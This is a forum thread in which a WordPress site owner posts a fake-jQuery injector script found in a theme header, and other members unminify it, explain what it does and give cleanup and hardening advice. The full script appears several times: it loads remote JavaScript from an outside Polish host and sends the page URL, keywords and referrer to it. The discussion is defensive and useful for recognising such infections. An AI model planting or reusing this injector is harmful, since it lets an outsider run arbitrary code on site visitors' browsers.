Help, I found this in a WP header...

Nat · Sep 2, 2016

I'm working on a semi-small project and purchased a premium WP theme for it because its not a focus/money website. I loaded the site on a different network connection and the firewall wouldn't load the site saying it was infected with a virus "JS/FakejQuery.BC!tr" -- I had no clue what that was, but I ran a page load test to see all of the requests and saw one suspicious one.

I found this code in the theme's WP header.

Code:

<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://global-kijanka.home.pl/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'snt2014' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>

I removed it, obviously... But what do I do now? Is there a chance something else is infected? I've run multiple online scans on the site's domain name and none of them came up positive (even when that script was still in the header). Do I need to reset all account passwords on the website?

I only have a few up-to date plugins installed.

CCarter · Sep 4, 2016

It's easier to read if you simply unminify the code first (http://unminify.com/):

Code:

< script >
    var a = '';
setTimeout(1);

function setCookie(a, b, c) {
    var d = new Date;
    d.setTime(d.getTime() + 60 * c * 60 * 1e3);
    var e = "expires=" + d.toUTCString();
    document.cookie = a + "=" + b + "; " + e
}

function getCookie(a) {
    for (var b = a + "=", c = document.cookie.split(";"), d = 0; d < c.length; d++) {
        for (var e = c[d];
            " " == e.charAt(0);) e = e.substring(1);
        if (0 == e.indexOf(b)) return e.substring(b.length, e.length)
    }
    return null
}
null == getCookie("__cfgoid") && (setCookie("__cfgoid", 1, 1), 1 == getCookie("__cfgoid") && (setCookie("__cfgoid", 2, 1), document.write('<script type="text/javascript" src="' + 'http://global-kijanka.home.pl/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'snt2014' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k = (function() {
    var keywords = '';
    var metas = document.getElementsByTagName('meta');
    if (metas) {
        for (var x = 0, y = metas.length; x < y; x++) {
            if (metas[x].name.toLowerCase() == "keywords") {
                keywords += metas[x].content;
            }
        }
    }
    return keywords !== '' ? keywords : null;
})()) == null ? (v = window.location.search.match(/utm_term=([^&]+)/)) == null ? (t = document.title) == null ? '' : t : v[1] : k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>'))); < /script>

setCookie and getCookies are two functions that "sets a cookie" and "checks for a cookie" respectively.

The next portion of the code literally pulls a file from "hxxp://global-kijanka.home.pl/js/jquery.min.php" and tells that file your location then WRITES NEW JAVASCRIPT onto the page this piece of code is on. What that new javascript does ¯\_(ツ)_/¯

And Yes, javascript can write and EXECUTE other javascript from outside sources.

So yes, it's very dangerous.

But here is the thing that's really interesting - if you read the URL string it supposedly sent to global-kijanka.home.pl (polish website), it gets sent over what should be the meta keywords (or title tags), along with the url, and other data, for some purpose - maybe data crunching? I dunno.

There is clearly more to this - but best case scenario it's a plugin that updates your title tag or some html element based on some algorithm for better CTR, user engagement, or dynamically adds affiliate links (some guesses as to the usefulness); worse case scenario it's a plugin that injects keywords/links into your content for 'blackhat link building' purposes or for affiliate dolla dolla bill y'all. But to be honest it can do whatever it wants to your web page.

Whatever scenario, it has the power to write javascript to your site, execute the javascript, and that javascript therefore will have the ability to edit what the viewer, and search engines, sees when visiting your website AFTER the page has rendered (so it wouldn't show up in the source code, unless you view 'generated source code').

Honestly my gut tells me you didn't actually purchase this theme or you didn't purchase it from a legit source (unless the legit source actually got hacked and they didn't realize this whole time they are spreading themes with malicious javascript installed - which I find highly unlikely, Ockham's razor). The reason people give out/torrent premium themes is because they infect them with viruses and malicious code. Really think about the "reason" why people do things. Why would someone put time and effort into hosting premium themes for free? Follow the money.

It's always better to get the $10, $35, or $100 theme from a legitimate source, since you shouldn't even be working on or wasting time on projects that can't ROI the cost of a $100 theme. (perhaps you didn't realize it was an illegitimate source but that therefore means you now have a bigger problem since they've got your credit card information).

Here is a bit more regarding this particular fake jquery.min.php infection: jQuery.min.php Malware Affects Thousands of Websites

Nat · Sep 4, 2016

CCarter said:
It's easier to read if you simply unminify the code first (http://unminify.com/):

Code:

< script > var a = ''; setTimeout(1); function setCookie(a, b, c) { var d = new Date; d.setTime(d.getTime() + 60 * c * 60 * 1e3); var e = "expires=" + d.toUTCString(); document.cookie = a + "=" + b + "; " + e } function getCookie(a) { for (var b = a + "=", c = document.cookie.split(";"), d = 0; d < c.length; d++) { for (var e = c[d]; " " == e.charAt(0);) e = e.substring(1); if (0 == e.indexOf(b)) return e.substring(b.length, e.length) } return null } null == getCookie("__cfgoid") && (setCookie("__cfgoid", 1, 1), 1 == getCookie("__cfgoid") && (setCookie("__cfgoid", 2, 1), document.write('<script type="text/javascript" src="' + 'http://global-kijanka.home.pl/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'snt2014' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k = (function() { var keywords = ''; var metas = document.getElementsByTagName('meta'); if (metas) { for (var x = 0, y = metas.length; x < y; x++) { if (metas[x].name.toLowerCase() == "keywords") { keywords += metas[x].content; } } } return keywords !== '' ? keywords : null; })()) == null ? (v = window.location.search.match(/utm_term=([^&]+)/)) == null ? (t = document.title) == null ? '' : t : v[1] : k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>'))); < /script>

setCookie and getCookies are two functions that "sets a cookie" and "checks for a cookie" respectively.

The next portion of the code literally pulls a file from "hxxp://global-kijanka.home.pl/js/jquery.min.php" and tells that file your location then WRITES NEW JAVASCRIPT onto the page this piece of code is on. What that new javascript does ¯\_(ツ)_/¯

And Yes, javascript can write and EXECUTE other javascript from outside sources.

So yes, it's very dangerous.

But here is the thing that's really interesting - if you read the URL string it supposedly sent to global-kijanka.home.pl (polish website), it gets sent over what should be the meta keywords (or title tags), along with the url, and other data, for some purpose - maybe data crunching? I dunno.

There is clearly more to this - but best case scenario it's a plugin that updates your title tag or some html element based on some algorithm for better CTR, user engagement, or dynamically adds affiliate links (some guesses as to the usefulness); worse case scenario it's a plugin that injects keywords/links into your content for 'blackhat link building' purposes or for affiliate dolla dolla bill y'all. But to be honest it can do whatever it wants to your web page.

Whatever scenario, it has the power to write javascript to your site, execute the javascript, and that javascript therefore will have the ability to edit what the viewer, and search engines, sees when visiting your website AFTER the page has rendered (so it wouldn't show up in the source code, unless you view 'generated source code').

Honestly my gut tells me you didn't actually purchase this theme or you didn't purchase it from a legit source (unless the legit source actually got hacked and they didn't realize this whole time they are spreading themes with malicious javascript installed - which I find highly unlikely, Ockham's razor). The reason people give out/torrent premium themes is because they infect them with viruses and malicious code. Really think about the "reason" why people do things. Why would someone put time and effort into hosting premium themes for free? Follow the money.

It's always better to get the $10, $35, or $100 theme from a legitimate source, since you shouldn't even be working on or wasting time on projects that can't ROI the cost of a $100 theme. (perhaps you didn't realize it was an illegitimate source but that therefore means you now have a bigger problem since they've got your credit card information).

Here is a bit more regarding this particular fake jquery.min.php infection: jQuery.min.php Malware Affects Thousands of Websites

Thank you for taking the time to respond with such a wonderful knowledge dump. This is the template I bought this directory I paid for it with PayPal (I'm happy to screenshot my PayPal receipt if you don't believe me). I downloaded the theme directly from the membership area of their website. Once I noticed the code I found that it was in the main theme and the child theme's header. I didn't upload any plugins that weren't directly downloaded from Wordpress.org or from templatic. The only chance of having a hacked 'free' theme is that one of the other domains hosted on the shared servers might have a hacked theme.

So, I removed the code itself from the header (both headers), but if a plugin injected the original <script> into the site it can obviously just inject it again. What should be my plan of action? (I would have just wiped the site and re-installed WP, re-installed the theme and plugins but I've put a solid week into customizing the settings, adding some content, and making small changes.) I changed all user passwords. I don't know what good re-installing the plugins will do since I downloaded them from legit sources, but I can delete them and re-install. If the problem is located in the sql database I'm out of luck because I don't have sql experience.

CCarter · Sep 4, 2016

It can also be your hosting company that's hacked.

builder · Sep 4, 2016

Nat said:
So, I removed the code itself from the header (both headers), but if a plugin injected the original <script> into the site it can obviously just inject it again. What should be my plan of action? (I would have just wiped the site and re-installed WP, re-installed the theme and plugins but I've put a solid week into customizing the settings, adding some content, and making small changes.) I changed all user passwords. I don't know what good re-installing the plugins will do since I downloaded them from legit sources, but I can delete them and re-install. If the problem is located in the sql database I'm out of luck because I don't have sql experience.

Since you said you (1) have changed passwords and (2) do not want to lose a week of work:

Update your WP to the latest version (I hope you did it already!!)
Add the rewrites rule for wp-includes and the access restriction for wp-config mentioned here: https://codex.wordpress.org/Hardening_WordPress
Change your salts/keys too in wp-config.php
Install this plugin if it is still available: https://wordpress.org/plugins/sucuri-scanner/ (Watch their video too:

)

When you get time, read these links:
https://codex.wordpress.org/FAQ_My_site_was_hacked
https://codex.wordpress.org/Hardening_WordPress

Nat · Sep 4, 2016

builder said:
Since you said you (1) have changed passwords and (2) do not want to lose a week of work:

Update your WP to the latest version (I hope you did it already!!)

Add the rewrites rule for wp-includes and the access restriction for wp-config mentioned here: https://codex.wordpress.org/Hardening_WordPress

Change your salts/keys too in wp-config.php

Install this plugin if it is still available: https://wordpress.org/plugins/sucuri-scanner/ (Watch their video too:

)

When you get time, read these links:
https://codex.wordpress.org/FAQ_My_site_was_hacked
https://codex.wordpress.org/Hardening_WordPress

Thank you! The site has only been up for a week so there aren't any updates for WP. I'm going to implement all of your suggestions now. :smile:

Help, I found this in a WP header...

Nat

CCarter

Final Boss ®

Nat

CCarter

Final Boss ®

builder

Nat